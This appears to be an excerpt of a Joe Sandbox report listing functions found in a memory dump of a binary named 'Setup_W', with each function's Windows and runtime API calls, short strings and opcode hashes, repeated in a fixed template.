Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
Instruction ID: 7226391e82f3ffb54ddf767a3f68459dd85a18fc98c3cf3d1ef2e38c82678296
Opcode Fuzzy Hash: fb47cb68cad1c4fe699bf62163b22cfa841e423b213ee8d5781f7575e1c3bea3
Instruction Fuzzy Hash: 862129706082018BE700DF6CC4C079A7FE1BFAA354F54C669D4988F299EF34D841CBA2

Function 646036A2 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 57stringCOMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 646036F5
calloc.MSVCRT ref: 6460370E
calloc.MSVCRT ref: 64603721
strncpy.MSVCRT ref: 6460374A

Strings

, xrefs: 64603738

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: calloc$strncpy
String ID:
API String ID: 3831826497-3916222277
Opcode ID: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
Instruction ID: 67085ad108993bd3ce5493b9702836e3a77efd71178ef21b3a30bf35c66d437d
Opcode Fuzzy Hash: 3ecbbced3f8f1552e037da450b4e3eb8689c922739d62125c82275acb59299c6
Instruction Fuzzy Hash: DB21D6B0908245CFDB04EF68D685A8ABBE4EF59714F41886EE8488B302D775D885CB92

Function 6460D4A1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111windowkeyboardtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B02F
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B03F
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B051
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B063
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B06F
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B081
Part of subcall function 6460B019: GetKeyState.USER32 ref: 6460B092

MapVirtualKeyW.USER32 ref: 6460D4D6
GetMessageTime.USER32 ref: 6460D4F9
PeekMessageW.USER32 ref: 6460D528

Strings

,, xrefs: 6460D5C5

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: State$Message$PeekTimeVirtual
String ID: ,
API String ID: 1171625170-3772416878
Opcode ID: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
Instruction ID: 6c46310d30a11a7dc731c5c7cee37011acf60de45a34a29a6c8da7496cf55ec6
Opcode Fuzzy Hash: 4ee1db7b8f5ffe9687f9134610cfb6f340ffa0424a311f8317f69ea6582160f0
Instruction Fuzzy Hash: 1451AEB0908709DFDB09DFA9C58469EBBF0BB85715F10CA2EE8989B251D7749884CF42

Function 6460B0A6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000000), ref: 6460B0C0

Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460870F
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 6460872B
Part of subcall function 646086AB: VerSetConditionMask.KERNEL32 ref: 64608747
Part of subcall function 646086AB: RtlVerifyVersionInfo.NTDLL ref: 64608765

SystemParametersInfoW.USER32 ref: 6460B10C
SystemParametersInfoW.USER32 ref: 6460B130

Strings

Hcd, xrefs: 6460B0F5

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ConditionInfoMask$ParametersSystem$ExecutionStateThreadVerifyVersion
String ID: Hcd
API String ID: 2138337975-1373192235
Opcode ID: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
Instruction ID: d552217315db711c433609a4cec4eadd01faa30551330ef515e34a60748e55aa
Opcode Fuzzy Hash: 979452bf78e6a26bae13934c425d8f3d7aacf65e4f70a9a2e2ee3aaa43562847
Instruction Fuzzy Hash: 101115B04093449FEB00AF65CA8835ABBF4FF44B19F41D89DE8D84B245D7B98484CF92

Function 64610B26 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 646107E0: VirtualQuery.KERNEL32 ref: 64610867

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,646012A5), ref: 64610AE7

Strings

,cd, xrefs: 64610B67
,cd, xrefs: 64610B30
,cd, xrefs: 64610B35

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: ,cd$,cd$,cd
API String ID: 1027372294-2852098346
Opcode ID: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
Instruction ID: f638c8752a7dbe41f4048da6431f0888c62e674f3ed1fb414c928f257171a9b6
Opcode Fuzzy Hash: 27a0cc24ec2899f064101a97017778c95a2771941521fb0748c90b8f7c6fa918
Instruction Fuzzy Hash: ED114876908356CFCF10CF19D88068AB3F2FF8A718F25991AD9896B211D330B956CF81

Function 6460A958 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

EnumDisplaySettingsW.USER32 ref: 6460A9BC
ChangeDisplaySettingsExW.USER32 ref: 6460AA7D
realloc.MSVCRT ref: 6460AAB3
calloc.MSVCRT ref: 6460AAF8

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: DisplaySettings$ChangeEnumcallocrealloc
String ID:
API String ID: 3544475687-0
Opcode ID: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
Instruction ID: c93ec9d385b3a10b2921e0670dd044a3fb0b81f4653e2be81fd693868db3d0a6
Opcode Fuzzy Hash: a41ff70199d10c02772b2ed234642cbb0a79003aa1bc3d49f4ffc233d63aba94
Instruction Fuzzy Hash: E1510570904219DFDB25DF28CA847DEBBF4FF59740F0085AAE88897240E7749A85CF82

Function 6460D7CF Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

GetRawInputData.USER32 ref: 6460D811
free.MSVCRT ref: 6460D82D
calloc.MSVCRT ref: 6460D840
GetRawInputData.USER32 ref: 6460D87B

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: DataInput$callocfree
String ID:
API String ID: 253271340-0
Opcode ID: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
Instruction ID: 1ed7145e197558902ff6e0cccc15012f54cdcde242d917b0b66c177f5ba52cfe
Opcode Fuzzy Hash: 954507c9f8f9c0fa5b5b9a29e5123a72444107c4e07457c857fea385b82c8961
Instruction Fuzzy Hash: 1041F3B4908385CFDB11EF69C18428EBBF0FF49310F01892AE8989B245D7B19895CF82

Function 6460844C Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 64608499
calloc.MSVCRT ref: 646084C5
WideCharToMultiByte.KERNEL32 ref: 64608502
free.MSVCRT ref: 64608522

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFormatLastMessagecallocfree
String ID:
API String ID: 1537213191-0
Opcode ID: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
Instruction ID: ef536ac8975c90811966666c3dcde00199d1f5530d8d2836d31ad81eeeae261d
Opcode Fuzzy Hash: 3d0c78a17ad77bacfd292b0c00cf2782b6b12de301c58f07c63f4f81ae6a1bd5
Instruction Fuzzy Hash: F321D6B05093019FE350EF69D54434EBFE4EF85764F008A2EE4D88B290D7B9C9898B93

Function 6460877D Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 646087DA
VerSetConditionMask.KERNEL32 ref: 646087F6
VerSetConditionMask.KERNEL32 ref: 64608812
RtlVerifyVersionInfo.NTDLL ref: 64608830

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersion
String ID:
API String ID: 2793162063-0
Opcode ID: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
Instruction ID: 4a59f3fe28d3ad8b5ea2a09b7c1bad3ccb1520fbea3e1431eb5efdb67375cc92
Opcode Fuzzy Hash: b15dccf56477bde5318b4f68f24da93d82684037e847ed2ac8d9eb5989c5f478
Instruction Fuzzy Hash: 1A11DAB08083049FEB11AF29C5493AABFF4EB84354F00C85DE5D887281E7B99598CF82

Function 64602F6E Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: ec2cc9c99320ea792083c759f0b5b32b1460c23741c03a6f318325e4b3715790
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602F44 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: e3dab228de318dfc6ea312c43b609d844db44e877f9dd8aa1410c2acb6c954e4
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602F59 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 3044d3b78d5a737cd0ba3ce62582d579fbd8dc1c671cf09e7d97e15f0688a9cf
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FEF Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: b024e20fd1ac5cf0abd56b393151b0c3e416e959e0e1641dc301de79ef919e2e
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FCB Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CriticalSectionValuestrcpy$EnterLeavecalloc
String ID: @Jcd
API String ID: 53972724-3276935698
Opcode ID: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
Instruction ID: 7fd2984509a053d55db608ef4d1ab515e20b84781e8ed9c487876e98fe24c1c5
Opcode Fuzzy Hash: 904ceed22d49ab97418f70abad013f8d0f19ab29fab4b1345db1653271da0f0c
Instruction Fuzzy Hash: B40171B19093508BE712AF69C64025DBBE0FF66B45F01992ED1C89B700D775C8C1DB5B

Function 64602FDD Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 42stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 64602FFC
strcpy.MSVCRT ref: 64603079

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

calloc.MSVCRT ref: 64603030

Part of subcall function 6460ADB6: TlsSetValue.KERNEL32(?,?,?,?,?,64603047), ref: 6460ADEF

Part of subcall function 6460AE74: EnterCriticalSection.KERNEL32(?,?,?,?,?,64603053), ref: 6460AEA6

Part of subcall function 6460AEB2: LeaveCriticalSection.KERNEL32(?,?,?,?,?,6460306C), ref: 6460AEE4

Strings

@Jcd, xrefs: 64603008

